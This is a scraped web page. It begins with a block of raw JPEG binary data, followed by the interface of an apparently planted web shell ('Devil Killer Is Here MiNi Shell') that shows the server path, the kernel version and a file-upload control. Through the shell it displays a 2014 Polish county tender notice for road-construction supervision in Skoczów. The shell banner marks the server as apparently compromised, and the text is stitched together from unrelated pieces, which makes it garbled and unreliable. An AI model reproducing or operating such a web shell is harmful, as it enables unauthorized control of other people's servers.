JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140508/154852-N-2014.html

<p class="kh_header"><b>Cieszyn: Pełnienie funkcji Inspektora Nadzoru nad robotami budowlanymi Skoczów ul. Górecka</b><br>
<b>Numer ogłoszenia: 154852 - 2014; data zamieszczenia: 08.05.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Cieszyński w imieniu którego występuje Zarząd Powiatu Cieszyńskiego , ul. Bobrecka 29, 43-400 Cieszyn, woj. śląskie, tel. 33 4777213, faks 33 4777133.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.cieszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inspektora Nadzoru nad robotami budowlanymi Skoczów ul. Górecka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest pełnienie funkcji Inspektora Nadzoru nad robotami budowlanymi dla zadania pn.: Przebudowa drogi powiatowej nr 2602 S ul. Górecka w Skoczowie wraz z przebudowa i budową niezbędnej infrastruktury na długości ok. 2,1 km, z wyłączeniem odcinka w km 0+740 do 0+934 - etap I od km 0+066 do 0+740, w tym nadzór nad:I)wykonaniem robót drogowych m.in.:a) wykonaniem nowej konstrukcji jezdni o szerokości 6,5 m (nowa podbudowa i nawierzchnia bitumiczna podnosząca nośność drogi do 115 kN/oś) oraz na dł. ok. 10 m od granicy opracowania dowiązanie wysokościowe odcinka projektowanego z istniejącym; b) przebudową skrzyżowań z drogami podporządkowanymi (przebudowa nawierzchni oraz korekta geometrii); c) przebudową lewostronnego chodnika o szerokości 2,00 m (lokalne zawężony do 1,5m); d) przebudową prawostronnego chodnika na ciąg pieszo-rowerowego o szerokości 2,50 m (lokalnie 3m); e) przebudową oraz dowiązanie wysokościowe zjazdów publicznych i indywidualnych znajdujących się w pasie drogowym; f) przebudową lewostronnej zatoki autobusowej w km ok. 0+500 oraz wykonaniem jednego przystanku po stronie prawej w km ok. 0+510 - wyznaczonego najezdni za pomocą linii P17; g) przebudową istniejącej zatoki postojowej z zastosowaniem normatywnych skosów najazdowych oraz wyjazdowych, jak również normatywnych stanowisk postojowych dla samochodów osobowych; h) budową (przebudową) kanalizacji deszczowej (na istniejącym kolektorze zlokalizowanym w prawostronnym chodniku zabudowa nowych studni oraz wykonanie nowych studzienek wpustowych wraz z przykanalikami); i) wykonaniem oznakowania poziomego i pionowego oraz montażem urządzeń bezpieczeństwa ruchu pieszych (słupki z łańcuchami); II)przebudową i zabezpieczeniem urządzeń infrastruktury technicznej kolidującej z przebudową drogi (uzbrojenie teletechniczne, energetyczne, gazowe); III) innymi robotami budowlanymi warunkującymi pełne wykonanie przez Wykonawcę robót zadania inwestycyjnego zgodnie z dokumentacją techniczną, obowiązującymi przepisami i aktualnymi normami. IV)	 Zamówienie obejmuje także pełnienie nadzoru oraz weryfikację innych elementów wchodzących w zakres zamówienia na roboty budowlane takich jak: a) obsługa geodezyjną i pomiarem geodezyjnym powykonawczym; b) opracowanie projektu organizacji ruchu na czas prowadzenia robót wraz z jego zatwierdzeniem; c) opracowanie planu BIOZ;
2. Projekt Przebudowa drogi powiatowej nr 2602 S ul. Górecka w Skoczowie wraz z przebudową i budową niezbędnej infrastruktury na długości ok. 2,1 km, z wyłączeniem odcinka w km 0+740 do 0+934 - etap I od km 0+066 do 0+740 realizowany będzie w oparciu o: a) decyzję Starosty Cieszyńskiego o zezwoleniu na realizację inwestycji drogowej nr 3 znak WB-MB 7331/4/2009/2012 z dnia 02.07.2012r., b) postanowienie Starosty Cieszyńskiego znak WB-MB 7331/4/2009/2012 z dnia 15.10.2012r prostujące z urzędu oczywisty błąd w decyzji Starosty Cieszyńskiego o zezwoleniu na realizację inwestycji drogowej nr 3 znak WB-MB 7331/4/2009/2012 z dnia 02.07.2012r. 3. Dokumentacja techniczna zawiera projekty, specyfikacje techniczne wykonania i odbioru robót oraz przedmiary w zakresie: a) P.W. przebudowy ul. Góreckiej w Skoczowie. Branża drogowa.  b) P.B.-W. przebudowy ul. Góreckiej w Skoczowie. Branża instalacyjna (kanalizacja deszczowa).  c) P.B.-W. przebudowy ul. Góreckiej w Skoczowie. Branża drogowa (docelowa organizacja ruchu). d) P.B.-W. przebudowy ul. Góreckiej w Skoczowie. Branża teletechniczna.  e) P.B.-W. przebudowy ul. Góreckiej w Skoczowie. Branża elektryczna. f) Projekt Zagospodarowania Terenu przebudowy ul. Góreckiej w Skoczowie. g) Przedmiary robót. h) Specyfikacje Techniczne Wykonania i Odbioru Robót. i) Uzupełnienie do specyfikacji technicznych wykonania i odbioru robót.
Szczegóły zamówienia publicznego na roboty budowlane (stanowiące przedmiot nadzoru) dotyczące wykonania zadania pn.: Przebudowa drogi powiatowej nr 2602 S ul. Górecka w Skoczowie wraz z przebudowa i budową niezbędnej infrastruktury na długości ok. 2,1 km, z wyłączeniem odcinka w km 0+740 do 0+934 - etap I od km 0+066 do 0+740, znajdują się na stronie internetowej: www.powiat.cieszyn.pl  w Biuletynie Informacji Publicznej BIP, Numer postępowania: ZP.272.12.2014, a ogłoszenie o zamówieniu zostało Opublikowane w Biuletynie Zamówień Publicznych dnia 30.04.2014r. pod numerem: 146544-2014. 4. UWAGI Zadania i obowiązki Inspektora nadzoru - wymagania szczegółowe:	w okresie od rozpoczęcia realizacji robót do zakończenia okresu gwarancyjnego dla zadania pn. Przebudowa drogi powiatowej nr 2602 S ul. Górecka w Skoczowie wraz z przebudową i budową niezbędnej infrastruktury na długości ok. 2,1 km, z wyłączeniem odcinka w km 0+740 do 0+934 - etap I od km 0+066 do 0+740  Wykonawca (Inspektor nadzoru) jest zobowiązany do:1)współpracy z Zamawiającym w zorganizowaniu i przeprowadzeniu procesu przekazania placu budowy;2)do 1 miesiąca od otrzymania od Zamawiającego dokumentacji technicznej zadania podlegającego nadzorowi Weryfikator dokumentacji projektowej przedstawi na piśmie wstępną opinię w zakresie kompletności dokumentacji (m.in. pod względem uzgodnień branżowych, poprawności i kompletności danych wyjściowych pozyskanych przez projektanta do projektowania), poprawności  rozwiązań projektowych, m.in w aspekcie uwzględnienia rzeczywistych warunków terenowych;3)opiniowania wniosków Wykonawcy w sprawie dokonania zmian personelu wskazanego w ofercie i przedłożenie jej Zamawiającemu do zatwierdzenia;4)	opiniowania Planu Bezpieczeństwa i Ochrony Zdrowia przedstawionego przez Wykonawcę robót przed rozpoczęciem robót; 5)	uzgodnienia z Wykonawcą robót procedur (wzory druków i obieg dokumentów), jakie będą obowiązywać podczas procesu prowadzenia inwestycji, spójnych z wymaganiami Zamawiającego;6)weryfikacji i zatwierdzenia Programów Zapewnienia Jakości (PZJ) sporządzanych przez Wykonawcę robót;7)analizowania harmonogramu robót, wnioskowania do Wykonawcy robót o jego korektę bądź zmianę i przedkładanie Zamawiającemu do zatwierdzenia;8)analizowania harmonogramów/planów naprawczych w przypadku wystąpienia opóźnień w rzeczowej realizacji inwestycji i przedstawianie własnych propozycji w zakresie technologii i organizacji robót w celu dotrzymania właściwego (planowanego) terminu zakończenia robót;9)bieżącej kontroli zgodności wykonywanych prac z harmonogramem i niezwłocznego informowania Zamawiającego o stwierdzonych zagrożeniach w dotrzymaniu przez Wykonawcę robót terminu zakończenia realizacji inwestycji;10)weryfikowania i podejmowania decyzji o dopuszczeniu do stosowania (lub odrzuceniu) receptur, materiałów, prefabrykatów, w tym mieszanek mineralno - bitumicznych i betonów na podstawie dostarczonych przez Wykonawcę koniecznych dla nich badań, prób, testów, dokumentów jakościowych, certyfikatów i atestów, w oparciu o obowiązujące przepisy, aktualne na dzień stosowania normy, oraz wymagania sformułowane w umowie z Wykonawcą robót, dokumentacji projektowej i Specyfikacjach Technicznych Wykonania i Odbioru Robót;11)weryfikowania i podejmowania decyzji o dopuszczeniu do stosowania (lub odrzuceniu) sprzętu i urządzeń przewidzianych do realizacji robót w oparciu o obowiązujące przepisy, aktualne na dzień stosowania normy, oraz wymagania sformułowane w umowie z Wykonawcą robót, dokumentacji projektowej i Specyfikacjach Technicznych Wykonania i Odbioru Robót;12)	 wnioskowania lub opiniowania wniosków Wykonawcy robót w sprawie niezbędnych zmian w dokumentacji projektowej;13)koordynowania prowadzenia nadzoru autorskiego przez projektantów, stwierdzanie konieczności pobytu projektanta na budowie oraz potwierdzanie wykonania nadzoru autorskiego;14)wnioskowania o wykonanie niezbędnych badań technicznych i ekspertyz;15)	prowadzenia kontroli bieżącej wytwórni materiałów, prefabrykatów, mas bitumicznych, betonów w celu sprawdzenia zgodności i akceptacji stosownych metod wytworzenia, kontroli sposobu składowania i przechowywania materiałów oraz uporządkowania miejsc składowania po zakończeniu robót;16)przeprowadzania kontroli Laboratorium Wykonawcy w celu sprawdzenia, czy stosowane urządzenia pomiarowe i sprzęt laboratoryjny Wykonawcy posiadają ważną legalizację, zostały prawidłowo wykalibrowane i odpowiadają wymogom norm określających procedurę badań, uczestniczenia w badaniach przeprowadzonych w tym Laboratorium przez Wykonawcę w czasie trwania budowy;17)zatwierdzania materiałów, technologii budowlanych oraz jakości wykonania zgodnie z warunkami kontraktów i dokumentacją projektową dla wszystkich asortymentów robót;18)	sprawdzania i odbioru robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i badaniach oraz odbiorach końcowych i przekazywanie ich do użytkowania;19)dokonywania odbiorów częściowych, odbioru końcowego, odbiorów gwarancyjnych;20)wydawania poleceń kierownikowi budowy dotyczących usunięcia nieprawidłowości lub zagrożeń, które skutkować mogłyby zagrożeniem bezpieczeństwa lub spowodować niedopuszczalną niezgodność z projektem czy pozwoleniem na budowę (zezwoleniem na realizację inwestycji drogowej);21)kontrolowania ilości i wartości prowadzonych robót w okresach miesięcznych; finansowe rozliczenie nadzorowanych robót oraz potwierdzanie protokołów odbioru urządzeń lub przyjęcia materiałów, z podaniem miejsca ich składowania;22)uczestniczenia w kontrolach przeprowadzanych przez Nadzór Budowlany i inne organy uprawnione do kontroli oraz sprawdzanie realizacji ustaleń i decyzji podjętych podczas tych kontroli;23)	uczestniczenia w uzupełnianiu i składaniu informacji i dodatkowych wyjaśnień związanych z realizacją Projektu do Instytucji Zarządzającej dofinansowaniem w przypadku wystąpienia takiej potrzeby;
24)	udziału w cyklicznych przeglądach gwarancyjnych prowadzonych zgodnie z warunkami umowy;25)	sprawdzania i opiniowania dokumentacji projektowej w trakcie trwania robót w zakresie przyjętych rozwiązań projektowych, ich wykonalności, Szczegółowych Specyfikacji Technicznych Wykonania i Odbioru Robót dla robót, technologii robót, zastosowania materiałów, itp.;26)opiniowania na wniosek Zamawiającego polisy ubezpieczeniowej Wykonawcy i jej zgodności z warunkami przedstawionymi w SIWZ;27)	powiadamiania właściwych urzędów i załatwianie niezbędnych formalności w przypadku odkrycia wykopalisk;28)opiniowanie wniosku Wykonawcy o przesunięcie planowanego terminu zakończenia robót;29)	potwierdzania dopuszczenia do pracy sprzętu, urządzeń i narzędzi przewidzianych do realizacji robót w oparciu o obowiązujące przepisy, normy techniczne i inne wymagania sformułowane w Warunkach Kontraktu, dokumentacji projektowej i Specyfikacjach Technicznych Wykonania i Odbioru Robót, a także w przepisach BHP i p/poż.;30)	zlecania usunięcia robót niewłaściwych i wykonanych poniżej obowiązującego standardu;31)kontrolowania wykonania robót w zakresie zgodności z rysunkami, Specyfikacjami Technicznymi Wykonania i Odbioru Robót, warunkami Umowy, obowiązującymi przepisami i aktualnymi na dzień wykonywania robót normami;
32)	zlecania w uzasadnionych przypadkach wykonania przez Wykonawcę:a)   sprawdzenia  punktów  głównych  wytyczonych obiektów,b)  dokonywania ocen geologicznych w sytuacjach tego wymagających,c) w sytuacjach budzących wątpliwości odnośnie wyników badań zlecanie Wykonawcy robót wykonania kontrolnych badań polowych i laboratoryjnych;33)wydawania poleceń Wykonawcy do wykonania robót lub podjęcia niezbędnych przedsięwzięć jakie mogą być konieczne, aby uniknąć lub zmniejszyć ryzyko w przypadku jakiejkolwiek awarii mającej wpływ na bezpieczeństwo życia lub przylegającego majątku oraz powiadamianie o tym Zamawiającego; 34)organizowania we współpracy z Wykonawcą robót przynajmniej raz w miesiącu i prowadzenie Rady Budowy, sporządzanie z nich protokołów z podjętymi ustaleniami i przekazywanie ich zainteresowanym stronom w terminie do 3 dni po naradzie. Organizowanie Roboczych narad w zależności od potrzeb;
35)	przygotowywania i przekazywania Zamawiającemu we wskazanych przez niego terminach materiałów źródłowych niezbędnych do sporządzenia przez Koordynatora projektu sprawozdań i dokumentów wynikających z umowy zawartej z Instytucją Zarządzającą dofinansowaniem, w terminach umożliwiających Zamawiającemu wywiązanie się z zobowiązań umownych, a także poświadczanie i opiniowanie dokumentów i sprawozdań przygotowywanych przez Wykonawcę robót budowlanych tj. m.in. a)opiniowanie i zatwierdzanie harmonogramu robót (oraz aktualizacji harmonogramu robót) sporządzonego przez Wykonawcę robót, b)sporządzanie (przez Inspektora nadzoru) comiesięcznego sprawozdania (i przekazywanie do Zamawiającego w terminie do 7 dni od podpisania protokołu odbioru usługi za dany miesiąc rozliczeniowy) - informacji z realizacji usług wraz z informacjami o ewentualnych zagrożeniach powodujących zmiany w terminach i płatnościach,
c)	zatwierdzanie i przekazywanie Zamawiającemu sporządzonych przez Wykonawcę robót miesięcznych protokołów odbioru robót oraz weryfikacja i poświadczenie miesięcznych świadectw płatności sporządzonych przez Wykonawcę robót,d)przygotowanie (przez Inspektora Nadzoru) innych materiałów źródłowych, które będą niezbędne do właściwego prowadzenia przez Zamawiającego sprawozdawczości i rozliczeń w ramach realizacji umowy o dofinansowanie projektu
36)	sporządzenie sprawozdania końcowego z realizacji umowy zawierającego opinię techniczną zrealizowanego (nadzorowanego) zadania inwestycyjnego; 37)	sprawdzania miesięcznych zestawień wykonanych robót Wykonawcy robót oraz potwierdzenia ilości wykonanych robót (weryfikacja kart obmiarów) i kwoty do wypłaty w terminie do 5 dni roboczych od złożenia przez Wykonawcę zestawienia (wraz z dokumentami obmiarowymi); 38)	przyjmowania, opiniowania wniosków Wykonawcy robót w sytuacji, kiedy wystąpi  konieczność wykonania robót nieprzewidzianych w umowie, warunkujących jednak zakończenie zadania inwestycyjnego, weryfikowanie kosztorysów ofertowych Wykonawcy na powyższy zakres; 39)	sporządzania protokołów konieczności na roboty dodatkowe i uzupełniające po uprzednim zaakceptowaniu ich przez Zamawiającego; 40)	kontrolowania prawidłowego prowadzenia Dziennika Budowy i Ksiąg/Kart Obmiaru, prawidłowego gromadzenia dzienników laboratoryjnych, atestów materiałów, orzeczeń o jakości materiałów, recept roboczych, kontrolnych wyników badań i innych dokumentów niezbędnych do odbioru robót; 41)	opracowywania dla Zamawiającego informacji z realizowanego zadania inwestycyjnego; 42)stwierdzenia w miarę potrzeb zakończenia robót, przeprowadzenie odbioru wewnętrznego robót z udziałem przedstawiciela Zamawiającego, sporządzenie listy ewentualnych usterek i wyznaczenie czasu do ich usunięcia przez Wykonawcę;43)	wyznaczenia w porozumieniu z Zamawiającym terminu odbioru końcowego robót i powiadamianie o tym wszystkich zainteresowanych stron; 44)nadzorowania skompletowania przez Wykonawcę robót 2 kompletów archiwalnych dokumentacji powykonawczych z wszystkimi wymaganymi rysunkami roboczymi i warsztatowymi w systemie odpowiadającym STWiOR; 45)	sprawdzenia kompletności i prawidłowości operatu kolaudacyjnego sporządzonego przez Wykonawcę przed przedłożeniem go Zamawiającemu;46)	dokonywanie wraz z Zamawiającym odbioru usunięcia usterek zarówno w trakcie procedury odbiorowej, jak i w okresie gwarancyjnym, sporządzenie protokołu  usunięcia  usterek,  potwierdzenie zakończenia robót i gotowości do odbioru przed zgłoszeniem Zamawiającemu przez Wykonawcę;47)	udziału w przekazaniu wykonanych robót wraz z wymaganą dokumentacją poszczególnym zarządcom sieci nie związanych z infrastrukturą drogową (m.in. energetycznej, telekomunikacyjnej, kanalizacyjnej, wodociągowej, gazowej) na warunkach określonych przez nich w trakcie uzgadniania dokumentacji;48)	współpracy z Zamawiającym w zakresie prawidłowego utrzymania dróg w rejonie budowy, dróg przyległych jak i objazdowych. W przypadku ewentualnych powstałych zdarzeń w trakcie prowadzenia budowy Inspektora nadzoru przygotowuje dla Zamawiającego propozycje koniecznych działań;49)	wszelkich czynności stanowiących obowiązki Inspektora nadzoru inwestorskiego zgodnie z ustawą Prawo Budowlane.5.  Zamawiający zastrzega, że:a)zakres usług przyjętych do realizacji może ulec zmianie, zostać ograniczony lub Zamawiający może odstąpić od umowy w przypadku, gdy środki finansowe przeznaczone na ten cel zostaną zmienione, lub gdy zamawiający nie otrzyma środków finansowych od Instytucji Zarządzającej dofinansowaniem, 
b)	natychmiast zostanie zerwana umowa, w przypadku stwierdzenia niewłaściwego wykonania obowiązków. Wykonawcy nie przysługiwać będą żadne roszczenia z tego tytułu, za wyjątkiem wynagrodzenia należnego z wykonanej części umowy. 6. Zamawiający informuje, że okres gwarancji na wykonane roboty budowlane będzie wynosił 60 miesięcy licząc od dnia następnego po dacie spisania protokołu odbioru końcowego robót, i w tym okresie Inspektor nadzoru zobowiązany będzie do uczestnictwa w organizowanych na wniosek Zamawiającego cyklicznych przeglądach gwarancyjnych. Koszty uczestnictwa w przeglądach gwarancyjnych należy uwzględnić w kosztach pośrednich wycenianych usług nadzoru.
7. Zamawiający informuje, że Wykonawca robót budowlanych organizując biuro budowy zapewni oddzielne pomieszczenie dla Inspektora Nadzoru zgodnie z uzupełnieniem do Specyfikacji Technicznych Wykonania i Odbioru Robót, stanowiącym załącznik do Specyfikacji Istotnych Warunków Zamówienia na wykonanie robót budowlanych dla zadania pn.: Przebudowa drogi powiatowej nr 2602 S ul. Górecka w Skoczowie wraz z przebudową i budową niezbędnej infrastruktury na długości ok. 2,1 km, z wyłączeniem odcinka w km 0+740 do 0+934 - etap I od km 0+066 do 0+740 8. Projekt pn.: Przebudowa drogi powiatowej nr 2602 S ul. Górecka w Skoczowie wraz z przebudową i budową niezbędnej infrastruktury na długości ok. 2,1 km, z wyłączeniem odcinka w km 0+740 do 0+934 - etap I od km 0+066 do 0+740 realizowany będzie w ramach Narodowego Programu Przebudowy Dróg Lokalnych - Etap II Bezpieczeństwo - Dostępność - Rozwój.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga złożenia wadium w wysokości: 2.000,00zł (słownie: dwa tysiące złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W- Wykonawca dysponuje środkami finansowymi (dopuszczalne jest tu wykazanie środków z kredytu) w wysokości min. 60.000 zł,
- Wykonawca posiada opłaconą polisę od odpowiedzialności cywilnej w zakresie prowadzonej działalności, w tym działalności związanej z przedmiotem niniejszego zamówienia na wartość nie mniejszą niż 20.000 zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca będzie zobowiązany wykazać</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien dysponować wykwalifikowanym personelem, który posiada doświadczenie i uprawnienia zgodnie z wymaganiami: 1.Inspektor nadzoru, Inspektor nadzoru robót drogowych - Uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej lub konstrukcyjno-budowlanej bez ograniczeń - 3lata doświadczenia jako kierownik budowy w branży drogowej, kierownik robót drogowych lub inspektor nadzoru robót drogowych w rozumieniu ustawy Prawo budowlane; 2. Asystent Inspektora Nadzoru - Wykształcenie średnie lub           wyższe budowlane - 2 lata doświadczenia jako inżynier budowy lub 1 rok doświadczenia jako kierownik budowy w branży drogowej, kierownik robót drogowych lub inspektor nadzoru robót drogowych w rozumieniu ustawy Prawo budowlane; 3.	Inspektor Nadzoru robót instalacyjnych - w zakresie odwodnienia drogi -	Uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci kanalizacyjnych - 3 lata doświadczenia jako kierownik budowy,  kierownik robót lub inspektor nadzoru  w rozumieniu ustawy Prawo budowlane  w branży instalacyjnej w zakresie sieci kanalizacji deszczowej; 4.	Inspektor Nadzoru robót elektrycznych - Uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych/elektroenergetycznych - 3 lata doświadczenia jako kierownik budowy w branży elektrycznej, kierownik robót elektrycznych lub inspektor nadzoru robót elektrycznych w rozumieniu ustawy Prawo budowlane; 5.Inspektor Nadzoru robót teletechnicznych - Uprawnienia budowlane do kierowania robotami budowlanymi 
w specjalności telekomunikacyjnej/ teletechnicznej - 3 lata doświadczenia jako kierownik budowy w branży teletechnicznej, kierownik robót teletechnicznych lub inspektor nadzoru robót teletechnicznych w rozumieniu ustawy Prawo budowlane; 6.	Weryfikator dokumentacji projektowej - Uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej lub konstrukcyjno-budowlanej bez ograniczeń -2 lata doświadczenia jako kierownik budowy, kierownik robót drogowych lub jako inspektor nadzoru robót drogowych w rozumieniu ustawy Prawo budowlane
Uwaga:-Wykonawca zobowiązany jest do zapewnienia obsługi zadania przez wskazane w ofercie osoby. - W trakcie realizacji zadania Zamawiający wymaga codziennego pobytu Inspektora nadzoru na budowie w czasie trwania robót i stałego pobytu na budowie Asystenta Inspektora nadzoru w czasie trwania robót. Ponadto czas pracy zespołu Inspektora nadzoru winien zostać dostosowany do czasu pracy Wykonawcy robót, zakłada się w tym okresie ciągły pobyt pracowników przewidzianych do bezpośredniego nadzorowania robót na budowie oraz w zależności od potrzeb innych pracowników. -	zmiany personalne w stosunku do stanowisk wskazanych w ofercie są możliwe po zatwierdzeniu ich przez Zamawiającego.
